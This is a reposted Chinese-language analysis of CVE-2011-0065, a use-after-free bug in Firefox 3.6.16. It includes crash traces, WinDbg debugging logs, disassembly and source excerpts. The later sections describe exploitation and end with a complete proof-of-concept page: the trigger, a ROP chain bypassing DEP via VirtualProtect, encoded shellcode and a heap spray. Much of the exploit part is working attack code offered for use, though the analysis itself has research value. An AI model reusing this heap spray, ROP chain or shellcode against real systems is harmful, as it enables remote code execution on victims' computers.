CVE2011-0065-Mozilla Firefox3.6.16 mChannel use after free vulnerability
来源:互联网 发布:行业数据 编辑:程序博客网 时间:2024/05/29 13:12
CVE2011-0065-Mozilla Firefox3.6.16 mChannel use after free vulnerability
Author: instruder of Code Audit Labs of vulnhunt.com
Time: 2011/8/19
1 Affected Prodects
软件版本:Mozilla Firefox3.6.16
CVE ID :2011-0065
2 Vulnerability Details
在Firefox 3.6.16中,mChannel对象可以通过OnChannelRedirect这个方法来进行释放,但是释放之后,mChannel变成了悬挂指针,在脚本执行完之后,又会被nsObjectLoadingContent::LoadObject这个函数中mChannel->Cancel(NS_BINDING_ABORTED);
进行使用,导致use after free 漏洞.
3 Crash info
(a78.d94):Access violation - code c0000005 (first chance)First chanceexceptions are reported before any exception handling.Thisexception may be expected and handled.eax=0a0e3060ebx=07ccc184 ecx=0a19f000 edx=0566a100 esi=804b0002 edi=80000000eip=00857c64esp=0013f714 ebp=0013f8cc iopl=0 nv up eiplzrnapenccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246<Unloaded_Ed20.dll>+0x857c63:00857c642003 and byte ptr [ebx],al ds:0023:07ccc184=500:000> kbChildEBPRetAddrArgsto Child WARNING:Frame IP not in any known module. Following frames may be wrong.0013f7101080df8e 0a0e3060 804b0002 00000000 <Unloaded_Ed20.dll>+0x857c630013f8cc1080e720 07ccc184 0858aab0 00000001xul!nsObjectLoadingContent::LoadObject+0x108[e:\builds\moz2_slave\win32_build\build\content\base\src\nsobjectloadingcontent.cpp@ 1081]0013f8fc1080eadc 07ccc184 0013f9b4 00000001 xul!nsObjectLoadingContent::LoadObject+0xcd[e:\builds\moz2_slave\win32_build\build\content\base\src\nsobjectloadingcontent.cpp@ 986]0013faa01080eb2a 07ccc160 00000001 10190b32xul!nsHTMLObjectElement::StartObjectLoad+0x84[e:\builds\moz2_slave\win32_build\build\content\html\content\src\nshtmlobjectelement.cpp@456]0013faac10190b32 00000001 09bcc600 09bcc600xul!nsHTMLObjectElement::DoneAddingChildren+0x17[e:\builds\moz2_slave\win32_build\build\content\html\content\src\nshtmlobjectelement.cpp@174]0013fac810191b42 00000048 00000000 00000000 xul!SinkContext::CloseContainer+0xd2[e:\builds\moz2_slave\win32_build\build\content\html\document\src\nshtmlcontentsink.cpp@ 1018]0013fadc100d873e 07ce80b8 00000048 00000000 xul!HTMLContentSink::CloseContainer+0x32[e:\builds\moz2_slave\win32_build\build\content\html\document\src\nshtmlcontentsink.cpp@ 2392]0013faf4100d8501 00000048 00000000 09bcc600 xul!CNavDTD::CloseContainer+0x5e[e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @2762]0013fb24100d8418 00000002 00000048 00000000 xul!CNavDTD::CloseContainersTo+0xd1[e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @2812]0013fb3c1005c8f3 00000048 00000000 05261800 xul!CNavDTD::CloseContainersTo+0x38[e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @2954]0013fb581005c857 09bcc600 00000000 05261800 xul!CNavDTD::DidBuildModel+0x69[e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @397]0013fb70100c1284 00000000 05261800 05261804 xul!nsParser::DidBuildModel+0x42[e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\nsparser.cpp @1611]0013fb9410042d6e 00000001 00000001 00000001 xul!nsParser::ResumeParse+0x124[e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\nsparser.cpp @2381]0013fbb810042cdc 05261804 052e88ac 00000000 xul!nsParser::OnStopRequest+0x82[e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\nsparser.cpp @3029]0013fbd81001e6f2 05261804 052e88ac 00000000 xul!nsDocumentOpenInfo::OnStopRequest+0x56[e:\builds\moz2_slave\win32_build\build\uriloader\base\nsuriloader.cpp@ 324]0013fbfc100786f1 052e88ac 0529a920 00000000 xul!nsBaseChannel::OnStopRequest+0x55[e:\builds\moz2_slave\win32_build\build\netwerk\base\src\nsbasechannel.cpp @681]0013fc1c10070fd1 0081d560 056dd670 00817400 xul!nsInputStreamPump::OnStateStop+0x3f[e:\builds\moz2_slave\win32_build\build\netwerk\base\src\nsinputstreampump.cpp@ 577]0013fc3010035121 0529a924 07410b08 056dd660xul!nsInputStreamPump::OnInputStreamReady+0x4c[e:\builds\moz2_slave\win32_build\build\netwerk\base\src\nsinputstreampump.cpp@ 402]0013fc40100f4380 056dd660 0081d560 0013ff34 xul!nsOutputStreamReadyEvent::Run+0x1d[e:\builds\moz2_slave\win32_build\build\xpcom\io\nsstreamutils.cpp @ 192]0013fc68100cf5ca 056dd660 00000001 0013fc88 xul!nsThread::ProcessNextEvent+0x230[e:\builds\moz2_slave\win32_build\build\xpcom\threads\nsthread.cpp @ 527] Ps:具体调试的时候可以下载火狐的符号,或者自己编译源码(比较麻烦,debug版没编译通过过)例如这样:SRV*e:\symcache\*http://msdl.microsoft.com/download/symbols;SRV*e:\symcache\*http://symbols.mozilla.org/firefox
4 Analysis
分析上面的崩溃的堆栈信息,重启windbg,下如下断点:
0:000>bl 0 e10499052 0001 (0001) 0:**** xul!nsObjectLoadingContent::OnChannelRedirect0:000>bpxul!nsObjectLoadingContent::LoadObjectMatched: 1080e653xul!nsObjectLoadingContent::LoadObject (class nsAString_internal *, int, classnsCString *, int)Matched: 1080de86xul!nsObjectLoadingContent::LoadObject (class nsIURI *, int, class nsCString *,int)Ambiguous symbol error at'xul!nsObjectLoadingContent::LoadObject'0:000>bp 1080e6530:000>bp 1080de86 Poc样本:<html><body><object id="d"><object><script type="text/javascript">var e;e=document.getElementById("d");e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,newObject,0);e.data = "";//没这个也行的,触发是在脚本执行完毕后,ps:实际测试是这样的:) </script></body></html>执行poc样本.windbg断在onChannelRedirect函数. Breakpoint 1 hiteax=00000003 ebx=0013ef98 ecx=052e9018edx=109f5228 esi=051c5718 edi=00000000eip=10499052 esp=0013eca8 ebp=0013ecc8iopl=0 nv up eiplzrnapenccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246xul!nsObjectLoadingContent::OnChannelRedirect:10499052 8b4c2408 movecx,dwordptr [esp+8]ss:0023:0013ecb0=000000000:000>ddesp+80013ecb0 00000000 057369f0 00000000 00897640//第一个参数null 第二个参数newObject,第三个参数0记住这个057369f0,后面用到0013ecc0 00000000 0013ef68 0013ef68 101294380013ecd0 052e9018 00000003 00000003 0013ed800013ece0 005092f0 054f9c80 00000000 00379b060013ecf0 06060b0c 00000000 030c0ecc 008af0e00013ed00 06799403 051c5718 00379def 071220240013ed10 052e9018 00000003 0013ed80 000000010013ed20 087d1934 80570009 07dcd340 05736460 这个函数汇编代码xul!nsObjectLoadingContent::OnChannelRedirect:10499052 8b4c2408 movecx,dwordptr [esp+8]//aOldChannel10499056 56 push esi10499057 8b742408 movesi,dwordptr [esp+8]//aNewChannel1049905b 3b4e1c cmpecx,dwordptr [esi+1Ch]//mChannel=01049905e 7407 je xul!nsObjectLoadingContent::OnChannelRedirect+0x15 (10499067)//跳10499060 b802004b80 mov eax,804B0002h10499065 eb1a jmpxul!nsObjectLoadingContent::OnChannelRedirect+0x2f (10499081)10499067 8b4624 moveax,dwordptr [esi+24h]ds:0023:052e903c=00000000//mClassifier1049906a 85c0 test eax,eax1049906c 57 push edi1049906d 8b7c2414 movedi,dwordptr [esp+14h]10499071 7408 je xul!nsObjectLoadingContent::OnChannelRedirect+0x29 (1049907b)//跳10499073 8b10 movedx,dwordptr [eax]10499075 57 push edi10499076 51 push ecx10499077 50 push eax10499078 ff5210 call dwordptr [edx+10h]1049907b 897e1c movdwordptr [esi+1Ch],edi //0写入mChannel 对应源码:NS_IMETHODIMPnsObjectLoadingContent::OnChannelRedirect(nsIChannel*aOldChannel,nsIChannel *aNewChannel, PRUint32 aFlags){ // Ifwe're already busy with a new load, cancel the redirectif (aOldChannel != mChannel) {return NS_BINDING_ABORTED; }if (mClassifier) {mClassifier->OnRedirect(aOldChannel,aNewChannel); }mChannel = aNewChannel;return NS_OK;} 从上述源码可知,利用new object来替换mChannel,而new Object这个对象会在js函数onChannelRedirect执行完就会被释放(可以再这个js函数执行后紧跟一个申请内存的操作,大小和new object一样,即可站位mChannel :). F5继续执行,firefox里面有2个LoadObject函数先执行原型为nsresultnsObjectLoadingContent::LoadObject(nsIURI* aURI,PRBoolaNotify,constnsCString&aTypeHint,PRBoolaForceLoad)的LoadObject,执行后,又跳到原型为nsresultnsObjectLoadingContent::LoadObject(constnsAString&aURI,PRBoolaNotify,constnsCString&aTypeHint,PRBoolaForceLoad)函数,再次跳到nsObjectLoadingContent::LoadObject(nsIURI* aURI,PRBoolaNotify,constnsCString&aTypeHint,PRBoolaForceLoad)函数执行:nsresultnsObjectLoadingContent::LoadObject(nsIURI* aURI,PRBoolaNotify,constnsCString&aTypeHint,PRBoolaForceLoad) { ….. // Fromhere on, we will always change the content. This means that a //possibly-loading channel should be aborted.if (mChannel) {LOG(("OBJLC [%p]: Cancelling existingload\n", this)); if (mClassifier) {mClassifier->Cancel();mClassifier = nsnull; } //These three statements are carefully ordered: // -onStopRequest should get a channel whose status is the same as the // status argument // -onStopRequest must get a non-null channelmChannel->Cancel(NS_BINDING_ABORTED);//exploitif (mFinalListener) { //NOTE: Since mFinalListener is only set in onStartRequest, which takes //care of calling mFinalListener->OnStartRequest, mFinalListener is only //non-null here if onStartRequest was already called.mFinalListener->OnStopRequest(mChannel,nsnull, NS_BINDING_ABORTED);mFinalListener = nsnull; }mChannel = nsnull; }) …}汇编代码:1080df61 837b5000 cmpdwordptr [ebx+50h],01080df65 7456 je xul!nsObjectLoadingContent::LoadObject+0x137 (1080dfbd)1080df67 8d7358 lea esi,[ebx+58h]1080df6a 8b06 moveax,dwordptr [esi] ds:0023:052e903c=000000001080df6c 85c0 test eax,eax1080df6e 740f je xul!nsObjectLoadingContent::LoadObject+0xf9 (1080df7f)1080df70 8b08 movecx,dwordptr [eax]1080df72 50 push eax1080df73 ff5114 call dwordptr [ecx+14h]1080df76 33d2 xoredx,edx1080df78 8bce movecx,esi1080df7a e841da91ff call xul!nsCOMPtr_base::assign_with_AddRef (1012b9c0)1080df7f 8b4350 moveax,dwordptr [ebx+50h]1080df82 8b08 movecx,dwordptr [eax]1080df84 be02004b80 mov esi,804B0002h1080df89 56 push esi1080df8a 50 push eax1080df8b ff5118 call dwordptr [ecx+18h]1080df8e 8d4b38 lea ecx,[ebx+38h]1080df91 e85210b0ff call xul!nsCOMPtr<nsIPrefBranch>::operator nsIPrefBranch * (1030efe8)…. 单步日志0:000> teax=0514f000 ebx=052e8fe4 ecx=08d1aad0edx=054fee50 esi=052e9038 edi=80000000eip=1080df5b esp=0013f720 ebp=0013f8cciopl=0 nv up eiplnznapenccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206xul!nsObjectLoadingContent::LoadObject+0xd5:1080df5b 0f84bf060000 je xul!nsObjectLoadingContent::LoadObject+0x79a (1080e620) [br=0]0:000> teax=0514f000 ebx=052e8fe4 ecx=08d1aad0edx=054fee50 esi=052e9038 edi=80000000eip=1080df61 esp=0013f720 ebp=0013f8cc iopl=0 nv up eiplnznapenccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206xul!nsObjectLoadingContent::LoadObject+0xdb:1080df61 837b5000 cmpdwordptr [ebx+50h],0ds:0023:052e9034=057369f0//判断mChannel是否为00:000>dd 057369f0057369f0 00000000 00000000 00000000 0000000005736a00 00000000 00000000 00000000 0000000005736a10 00000007 05737e20 05742268 0000001605736a20 00000001 00000004 00353131 04cd63e005736a30 6e6f6e61 756f6d79 06750073 054d848005736a40 10a58be0 00000001 054cf288 0000001605736a50 00000007 05737f00 05742a48 0000001605736a60 00000001 00000001 054cf580 000000000:000> teax=0514f000 ebx=052e8fe4 ecx=08d1aad0edx=054fee50 esi=052e9038 edi=80000000eip=1080df67 esp=0013f720 ebp=0013f8cciopl=0 nv up eiplnznapenccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206xul!nsObjectLoadingContent::LoadObject+0xe1:1080df67 8d7358 lea esi,[ebx+58h]0:000> tBreakpoint 5 hiteax=0514f000 ebx=052e8fe4 ecx=08d1aad0edx=054fee50 esi=052e903c edi=80000000eip=1080df6a esp=0013f720 ebp=0013f8cciopl=0 nv up eiplnznapenccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206xul!nsObjectLoadingContent::LoadObject+0xe4:1080df6a 8b06 moveax,dwordptr [esi] ds:0023:052e903c=00000000////获取mClassifier0:000> tBreakpoint 6 hiteax=00000000 ebx=052e8fe4 ecx=08d1aad0edx=054fee50 esi=052e903c edi=80000000eip=1080df6e esp=0013f720 ebp=0013f8cciopl=0 nv up eiplzrnapenccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246xul!nsObjectLoadingContent::LoadObject+0xe8:1080df6e 740f je xul!nsObjectLoadingContent::LoadObject+0xf9 (1080df7f) [br=1]//跳0:000> tBreakpoint 3 hiteax=00000000 ebx=052e8fe4 ecx=08d1aad0edx=054fee50 esi=052e903c edi=80000000eip=1080df7f esp=0013f720 ebp=0013f8cciopl=0 nv up eiplzrnapenccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246xul!nsObjectLoadingContent::LoadObject+0xf9:1080df7f 8b4350 moveax,dwordptr [ebx+50h] ds:0023:052e9034=057369f00:000>dd 057369f0057369f0 00000000 00000000 00000000 00000000//注意这个地址就是前面xul!nsObjectLoadingContent::OnChannelRedirect的第二个参数地址,Object被释放了05736a00 00000000 00000000 00000000 0000000005736a10 00000007 05737e20 05742268 0000001605736a20 00000001 00000004 00353131 04cd63e005736a30 6e6f6e61 756f6d79 06750073 054d848005736a40 10a58be0 00000001 054cf288 0000001605736a50 00000007 05737f00 05742a48 0000001605736a60 00000001 00000001 054cf580 000000000:000> t(ff4.c50): Access violation - code c0000005(first chance)First chance exceptions are reported before anyexception handling.This exception may be expected and handled.eax=057369f0 ebx=052e8fe4 ecx=00000000edx=054fee50 esi=804b0002 edi=80000000eip=1080df8b esp=0013f718 ebp=0013f8cciopl=0 nv up eiplzrnapenccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246xul!nsObjectLoadingContent::LoadObject+0x105:1080df8b ff5118 call dwordptr [ecx+18h] ds:0023:00000018=????????5 Exploit
5.1 How to exploit
通过传递给onChannelRedirect第二个参数new object,替换mChannel,函数执行完后,new object被释放,紧跟着申请大小一致的内存,站位mChannel,如下:
e = document.getElementById("d");
e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,newObject,0)
fake_obj_addr = unescape("\x1c%u0c0c")
这样0c0c001c就会站位new object,在1080df82地址时,[eax]=0c0c001c,然后通过申请大量内存,覆盖0c0c0c0c地址,脚本执行完之后,通过调用LoadObject函数,在1080df8b地址处call dwordptr [ecx+18h]既可以触发shellcode的执行.
5.2 DEP PASS
由于并没找到原始poc上面的rop地址,于是自己在poc的sc变量前面加了很多的’AAAAAAAAAA’,然后自己调试,找到了一组rop序列
Rop序列Lshell32.dll)7D66A4E8 8B49 0C MOV ECX,DWORD PTRDS:[ECX+C]7D66A4EB 8B01 MOV EAX,DWORD PTRDS:[ECX]7D66A4ED 52 PUSH EDX7D66A4EE 51 PUSH ECX7D66A4EF FF50 14 CALL DWORD PTRDS:[EAX+14](同事教的一组指令,很管用在过rop的时候。)====0x65e3ffae : # PUSH ECX # POP ESP # POP EBP (GR99D3~1.DLL)(immedebug的mona脚本找的)====5DDBC012 83C4 14 ADD ESP,14(mshtml.dll)5DDBC015 C3 RETN//返回到VirtualProtect函数====执行VirtualProtect后返回到0c0C0084开始执行shellcode
6 Vulnerability demo
7 POC
<html><body><object id="d"><object><script type="text/javascript">e = document.getElementById("d");e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)fake_obj_addr = unescape("\x1C%u0c0c")//%// taken and modified from adobe_flashplayer_newfunction.rb %u1a77%u3e43 65e3f263 7D66A4E8var sc = unescape("%u4141%u4141%u0028%u0c0c%uc012%u5ddb%u4141%u4141%ua4e8%u7d66%u4141%u4141%uffae%u65e3%u4141%u4141%u0028%u0c0c%u4141%u4141%u4141%u4141%u4141%u4141%u1ad4%u7c80%u0084%u0c0c%u0028%u0c0c%u0400%u0000%u0040%u0000%u0028%u0c0c%uf00d%ubeef%u4413%u7c87%u0048%u0c0c%u0c00%u0c0c%u0400%u0000%u0040%u0000%u7174%u7276%u8646%ub0fc%u677b%u85bf%ubed6%u4fa8%uf987%u109b%uebd1%u2425%u0591%u349f%u9892%u3c4b%u731d%u7c78%u0c75%u42b7%ub997%u4e8d%ue389%ua927%u437f%u1c93%ub596%ud53b%ub6b4%u7748%u3115%uc7fe%uf8c0%u492c%u354a%u90b3%ud422%u14b1%ue083%ufd03%u2ab2%u3fe2%uf588%uba99%u047a%u2fb8%u7947%u3d2d%u7679%ubb41%ubba9%ub6b5%u2c71%u93ba%u2173%u7de1%u983d%u3fb1%ub88d%u9937%u6b14%u2ff9%u9134%u664f%u9fa8%u277e%u7a4e%u0147%u25e2%u2b46%u0cfd%u1cb2%u3590%ub9b3%u1d77%uf680%u3cd6%ueb8c%u1240%u3af8%u2dd4%u677f%u7241%u087c%u33e0%u0dfc%u9b97%u4b96%uf51b%ue381%u0543%u7b70%u0474%u00b0%ub4d5%ub724%u4978%u4a75%u1592%u48bf%ube42%u7c99%u7714%u9142%u2cb7%u24be%u9b2d%u7d71%u7b7a%u663f%u4398%u7973%ud428%u3d70%ub2b5%u0592%ub347%ubb96%u34b8%ub44a%ub904%u3578%ufc18%u904f%u41a8%ue211%ue30a%ud01a%ud6d2%u8da9%u0c7f%u4627%u13bf%ud3f7%ub1f8%u4840%u3715%u9f97%u3c75%uf50b%ud539%u7293%u324b%u30eb%ub6f9%u1949%uc1ff%u25e1%ue029%ufd38%ub067%u4e1c%u1dba%u742f%u760d%u7c7e%u277d%u4273%ufd02%u2d79%ua99b%ub11d%u7598%uf803%u7f35%ue320%u3f43%ub8ba%u7b9f%uf52b%u7a92%ub42c%u3dbe%u7191%u7072%ub766%u1c2f%ubf15%ub367%ubbb9%ue084%u4a41%u8925%u0cf9%u7677%ufc13%ueb81%u0d46%u4f90%u2147%u78d6%u9914%ud469%u05b2%u3cb5%u88b6%u4be1%u4897%u8da8%u24b0%u3334%u4ed5%u4093%u7496%u4904%ue20a%u7e37%u277f%u70b5%ue201%ub034%u7974%u1c7b%ud480%u4a8d%ua9b3%ue08c%u777e%u7204%u9947%ud232%u0dfc%u3776%u247a%u0b2f%ue1d1%u413f%ub8b2%u391d%u4ff5%ub625%u752d%u2973%u91f8%u909f%u4b7c%ue308%uf712%uc0c6%u9bfd%ua8b7%u40b9%u6796%u052c%u7149%u9843%u3cb1%u1935%u78eb%u9366%u144e%ud530%u9215%ubf0c%ubb42%u487d%u3dbe%ub4ba%ud687%u1146%u97f9%ueb20%u7f74%u777d%u4079%u8d3c%u0c9f%u4292%ufd6b%u97ba%ud618%ub798%uf909%u78b6%u7375%ub447%u227b%u23e0%ue3c1%ub02f%u1d70%u0035%u02e1%ub9d4%u7c37%uf83a%ue228%u717a%ud51b%u1472%u9646%u4148%ufc3b%u3d0d%u913f%ub3b2%ubb67%u9905%u2576%u1566%u93a9%ubfb8%u4a90%u7ea8%ueb31%u8434%u4fe2%u1c7b%u7cbe%u754e%uf538%u277a%ud085%u10e3%ue1d3%u724b%u7f2c%u7604%u8343%ue0f6%u9b49%u2d78%u247e%ub1b5%u3d70%u992d%u714f%ubb25%u9f48%u8da8%u3c7d%ubf9b%u4234%u1473%u4a41%u77b2%u9015%ufd40%u374b%u921c%u793f%u2c24%u1dd5%u0493%ub6b8%u4727%ub3b4%ua9b9%u67b5%ubad6%ube46%u49b1%u7491%u2a05%u0cf8%u2f98%u0df5%u4e96%u1a97%ub0d4%u6635%uf986%ufcb7%udb43%ub8d7%u42b3%u12d2%u74d9%uf424%u295f%ub1c9%u3144%u1947%u4703%u8319%ufcef%ub751%uf90b%ue10e%udad8%u23c4%u91f3%u7553%ub13a%u0410%ub18c%ueb50%ub367%u7880%u3431%u0033%ucf9e%uc575%ud791%uc60c%ue977%ud73f%u8969%u4434%u6e4e%ud0c1%ue5b2%uf281%uf8b2%u88c3%ue309%ud598%u12ad%u0a75%u5d99%uf902%u5c69%u33fa%u6e91%uc8c2%u15c1%u4402%ud71d%ua84d%u1020%u47ba%ue219%u8018%ufb2b%u8aeb%ufaf7%u4c00%uf073%u1a9d%u15d9%uf620%u2155%u09a9%ua382%u2de9%ud54e%u9f32%u3c66%u6960%ub793%u024a%u86d2%u3f44%ufeb8%u40c7%u00c2%ufb7e%u4439%udcfe%uc9a0%uc079%u7c00%u776d%u7fb7%u0192%u880d%u7e04%ua8e2%u1695%u9ac9%u833b%uae45%u2e30%ud8e4%u94ea%u5002%u83f4%u37ed%ua2fc%ue8d0%u1c47%u4576%uda0b%u726b%u0d21%u85f2%u323a%u169d%u95bc%u817e%u415d%u131a%uc0f5%ue081%uea76%u8f92%u2824%u192f%u5837%u3977%ub997%u74ef%uff84%ueece%u6f58%ucf7c%u00f4%u2f52%ub762%u4ae2%u2b06%u5dc2%uff5e%u4e00%ue1d7%ubc78%ub2b5%u122b%ue5c6%u52fd%uf968%u5aab")var ret_addr = unescape("%u0024%u0c0c")while(ret_addr.length+20+8 < 0x100000-18-12-12-12) {ret_addr += ret_addr}var b = ret_addr.substring(0,(0x48-0x24)/2)b += scb += ret_addrvar next = b.substring(0,0x10000/2)while(next.length<0x800000) {next += next}var again = next.substring(0,0x80000 - (0x1020-0x08)/2)array = new Array()for (n=0;n<0x1f0;n++){array[n] = again + sc}e.data = ""</script></body></html>- CVE2011-0065-Mozilla Firefox3.6.16 mChannel use after free vulnerability
- Use After Free
- Use After Free Tutorial
- use after free 引起KE
- UAF (use after free) 漏洞
- The free vulnerability scanner for small organizations or individual use
- 警告背后的use after free
- debug: user-after-free crash involving queue (涉及到buffering queue的use after free)
- 堆溢出和use after free的差异
- Heap Spray Exploit : CVE-2010-0249 Use After Free 初探
- 用slub track调试use after free问题
- UAF (Use After Free)漏洞分析及利用
- CVE-2011-0065 Firefox mChannel UAF漏洞
- use after free 漏洞的利用方法(堆转堆栈然后rop)
- Firefox3.5中Mozilla之书的翻译
- use awk to print after/before n lines after match
- Mozilla
- Best free tools/frameworks/libraries I use
- 在 .NET 应用程序上运行 Rational PurifyPlus
- hibernate的url加入存入数据库时的编码
- OpenCV Tutorial 2 - Chapter 3
- ubuntu 下连接iSCSI Volume
- struts jasperreport 错误解决
- CVE2011-0065-Mozilla Firefox3.6.16 mChannel use after free vulnerability
- 多校第6场 HDU 3893&&JLU Drawing Pictures(数位DP变形,矩阵连乘)
- 【数学建模集训系列】公交查询系统的matlab实现-价格计算
- 杭电 hdu 2066 一个人的旅行
- Spring MVC之MultiActionController
- OpenCV Tutorial 3 - Chapter 4
- HashMap和ConcurrentHashMap浅析
- 菜鸟之驱动开发6
- zoj 3317
